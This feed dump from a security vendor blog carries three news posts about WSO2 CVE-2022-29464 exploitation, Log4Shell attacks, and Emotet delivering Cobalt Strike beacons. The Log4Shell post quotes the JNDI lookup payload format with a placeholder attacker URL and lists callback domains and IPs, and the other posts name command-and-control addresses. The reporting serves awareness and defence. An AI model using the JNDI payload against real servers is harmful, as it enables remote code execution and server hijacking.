Cobalt Strike Beacons Archives – Gridinsoft Blog https://gridinsoft.com/blogs/tag/cobalt-strike-beacons/ Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Fri, 06 Oct 2023 23:40:08 +0000 en-US hourly 1 https://wordpress.org/?v=70731 200474804 A WSO2 Vulnerability is Fraught with Remote Code Execution https://gridinsoft.com/blogs/vso2-rce-vulnerability/ https://gridinsoft.com/blogs/vso2-rce-vulnerability/#respond Tue, 31 May 2022 22:04:00 +0000 https://gridinsoft.com/blogs/?p=8197 The products by WSO2, an open-source API, applications, and web services provider, have been attacked in the wild through the CVE-2022-29464 vulnerability detected back in April 2022. This vulnerability allows attackers to execute malicious code remotely via unhindered file uploading. The scheme of the attack begins with web shell installation through *.jsp or *.war files… Continue reading A WSO2 Vulnerability is Fraught with Remote Code Execution

The post A WSO2 Vulnerability is Fraught with Remote Code Execution appeared first on Gridinsoft Blog.

]]>
The products by WSO2, an open-source API, applications, and web services provider, have been attacked in the wild through the CVE-2022-29464 vulnerability detected back in April 2022.

This vulnerability allows attackers to execute malicious code remotely via unhindered file uploading.

The scheme of the attack begins with web shell installation through *.jsp or *.war files upload taking advantage of the CVE-2022-29464 vulnerability. As the web shell is installed, the attacker executes an arbitrary Java process with its help.

RELATED: Microsoft warns of growing number of attacks using web shells.

Attack scheme
Scheme of the attack. Image: Trend Micro

The results of the attack are the installation of a coin miner and Cobalt Strike beacon (backdoor.) The cryptocurrency miner is installed via the Java-process-launched wget command that installs the auto.sh file (the miner itself.) In the meantime, another part of the attack happens, also via the web shell. Java process calls a chmod command that modifies permissions to make it possible to run the process entitled “LBcgqCymZQhm” all through the same Java process. The process establishes an outbound connection to an IP address 179[.]60[.]150[.]29[.]4444, earlier tracked as a location involved in numerous Cobalt Strike attacks. Therefore, the LBcgqCymZQhm process is a Cobalt Strike backdoor beacon.

The most interesting thing is that the Cobalt Strike beacon, initially designed for Windows, turned out to be working on Linux during these attacks. That means the hackers have purposefully worked upon the backdoor’s compatibility with Linux.

The vulnerable software includes WSO2 API Manager 2.2.0 and above, Identity Server 5.2.0 and above, Identity Server Analytics 5.4.0 -5.6.0, Identity Server as a Key Manager 5.3.0 and above, Open Banking AM 1.4.0 and above, and Enterprise Integrator 6.2.0 and above. The patch is already there, so all users of the mentioned programs are advised to patch the flaws in question ASAP.

The multiple WSO2 clients belong to many industries, vital ones included. For example, healthcare, financial sector, energy, education, communications, and government. Needless to say, should the hackers exploit the CVE-2022-29464 vulnerability against unpatched systems, the consequences of the attack could be drastic.

A WSO2 Vulnerability is Fraught with Remote Code Execution

The post A WSO2 Vulnerability is Fraught with Remote Code Execution appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/vso2-rce-vulnerability/feed/ 0 8197
Experts are already fixing attacks on the Log4Shell vulnerability https://gridinsoft.com/blogs/attacks-on-the-log4shell-vulnerability/ https://gridinsoft.com/blogs/attacks-on-the-log4shell-vulnerability/#respond Tue, 14 Dec 2021 20:44:48 +0000 https://gridinsoft.com/blogs/?p=6649 Security researchers are already scanning the network looking for products affected by a dangerous bug in the Log4j library and are fixing the results of cybercriminals’ attacks on a Log4Shell vulnerability. The vulnerability is already being exploited to deploy miners, Cobalt Strike beacons, etc. An issue in the popular Log4j logging library included in the… Continue reading Experts are already fixing attacks on the Log4Shell vulnerability

The post Experts are already fixing attacks on the Log4Shell vulnerability appeared first on Gridinsoft Blog.

]]>
Security researchers are already scanning the network looking for products affected by a dangerous bug in the Log4j library and are fixing the results of cybercriminals’ attacks on a Log4Shell vulnerability.

The vulnerability is already being exploited to deploy miners, Cobalt Strike beacons, etc.

An issue in the popular Log4j logging library included in the Apache Logging Project was reported last week. The 0-day vulnerability received the identifier CVE-2021-44228 and scored 10 out of 10 points on the CVSS vulnerability rating scale, as it allows remote arbitrary code execution (RCE).

The problem is aggravated by the fact that PoC exploits have already appeared on the network, and the vulnerability can be exploited remotely, which does not require advanced technical skills.

The vulnerability forces Java-based applications and servers that use the Log4j library to log a specific line to their internal systems. When an application or server processes such logs, a string can cause the vulnerable system to load and run a malicious script from the domain controlled by the attacker. The result will be a complete hijacking of the vulnerable application or server.

Let me remind you that the patch has already been released as part of the 2.15.0 release.

The attacks on Log4Shell have already begun, Bleeping Computer now reports. The publication says that to exploit the bug. An attacker can change the user agent of his browser and visit a specific site or search for a string on the site using the format ${jndi:ldap://[attacker_URL]}.

This will eventually add a line to the web server’s access logs, and when the Log4j application parses these logs and finds the line, an error will force the server to execute a callback or request the URL specified in the JNDI line. Attackers can then use this URL to send commands to the vulnerable device (either Base64 encoded or Java classes).

Worse, simple pushing of a connection can be used to determine if a remote server is vulnerable to Log4Shell.

It is reported that attackers are already using Log4Shell to execute shell scripts that download and install various miners. In particular, the hackers behind the Kinsing malware and the botnet of the same name actively abuse the Log4j bug and use Base64 payloads that force the vulnerable server to download and execute shell scripts. The script removes the competing malware from the vulnerable device and then downloads and installs the Kinsing malware, which will start mining the cryptocurrency.
attacks on the Log4Shell vulnerability
In turn, Chinese experts from Netlab 360 warn that the vulnerability is being used to install Mirai and Muhstik malware on vulnerable devices. These IoT threats make vulnerable devices part of botnets, use them to extract cryptocurrency, and conduct large-scale DDoS attacks.

We received the first responses from our Anglerfish and Apacket honeypots, which recorded two waves of attacks using the Log4j vulnerability to form botnets. A quick sample analysis showed that they were used to form the Muhstik and Mirai botnets. That is, in both cases, they were aimed at Linux devices.the experts say.

According to Microsoft analysts, a vulnerability in Log4j is also used to drop Cobalt Strike beacons. Initially, Cobalt Strike is a legitimate commercial tool created for pen-testers and red teams focused on exploitation and post-exploitation. Unfortunately, it has long been loved by hackers, from government APT groups to ransomware operators.

So far, there is no evidence to guarantee that the ransomware has adopted an exploit for Log4j. Still, according to experts, deploying Cobalt Strike beacons indicates that such attacks are inevitable.

Also, in addition to using Log4Shell to install various malware, attackers use the problem to scan vulnerable servers and obtain information from them. For example, the exploit shown below can force vulnerable servers to access URLs or perform DNS lookups for callback domains. This allows information security specialists and hackers to determine if a server is vulnerable and use it for future attacks, research, or trying to get a bug bounty from its owners.

Journalists are concerned that some researchers may go too far by using an exploit to steal environment variables that contain server data, including the hostname, username under which the Log4j service runs, OS information, and OS version number.

The most common domains and IP addresses used for these scans are:

  • interactsh.com
  • burpcollaborator.net
  • dnslog.cn
  • bin${upper:a}ryedge.io
  • leakix.net
  • bingsearchlib.com
  • 205.185.115.217:47324
  • bingsearchlib.com:39356
  • canarytokens.com

The post Experts are already fixing attacks on the Log4Shell vulnerability appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/attacks-on-the-log4shell-vulnerability/feed/ 0 6649
Emotet now installs Cobalt Strike beacons https://gridinsoft.com/blogs/emotet-now-installs-cobalt-strike-beacons/ https://gridinsoft.com/blogs/emotet-now-installs-cobalt-strike-beacons/#respond Thu, 09 Dec 2021 19:44:50 +0000 https://gridinsoft.com/blogs/?p=6637 The researchers warn that Emotet now directly installs Cobalt Strike beacons on infected systems, providing immediate access to the network for attackers. Those can use it for lateral movement, which will greatly facilitate extortion attacks. Let me remind you that usually Emotet installs TrickBot or Qbot malware on the victim’s machines, and that one already… Continue reading Emotet now installs Cobalt Strike beacons

The post Emotet now installs Cobalt Strike beacons appeared first on Gridinsoft Blog.

]]>
The researchers warn that Emotet now directly installs Cobalt Strike beacons on infected systems, providing immediate access to the network for attackers. Those can use it for lateral movement, which will greatly facilitate extortion attacks.

Let me remind you that usually Emotet installs TrickBot or Qbot malware on the victim’s machines, and that one already deploys Cobalt Strike and performs other malicious actions. Now, the Cryptolaemus research group has warned that Emotet skips the installation of TrickBot or Qbot and directly installs Cobalt Strike beacons on infected devices.

Cryptolaemus is a group of more than 20 information security specialists from all over the world, who united back in 2018 for a common goal – to fight against Emotet malware.

This information was confirmed to the journalists of Bleeping Computer by the specialists of the information security company Cofense.

Some of the infected computers were instructed to install Cobalt Strike, a popular post-exploitation tool. Emotet itself collects a limited amount of information about the infected machine, but Cobalt Strike can be used to evaluate a broader network or domain assessment, looking for suitable victims for further infection, such as ransomware.experts say.

While Cobalt Strike was trying to contact the lartmana[.]сom domain, and shortly thereafter, Emotet was deleting the Cobalt Strike executable.”

In fact, this means that attackers now have immediate access to the network for lateral movement, data theft, and rapid ransomware deployment. The rapid deployment of Cobalt Strike is expected to speed up the deployment of ransomware on compromised networks as well.

It is very serious. Usually, Emotet will reset the TrickBot or QakBot, which in turn will reset the CobaltStrike. In a normal situation, you have about a month between the first infection and the extortion. With Emotet dropping CS directly, this delay is likely to be much shorter.security specialist Markus Hutchins warns on Twitter.

Cofense experts, in turn, report that it is not yet clear whether what is happening is a test of the Emotet operators themselves, or if it is part of a chain of attacks by another malware that cooperates with the botnet.

We do not yet know if the Emotet operators intend to collect the data for their own use, or if it is part of a chain of attacks belonging to one of the other families of malware. Given the quick removal, it could have been a test, or even an accident.the experts summarize, promising to continue monitoring further.

Let me remind you that I also reported that Trojan Emotet is trying to spread through available Wi-Fi networks.

The post Emotet now installs Cobalt Strike beacons appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/emotet-now-installs-cobalt-strike-beacons/feed/ 0 6637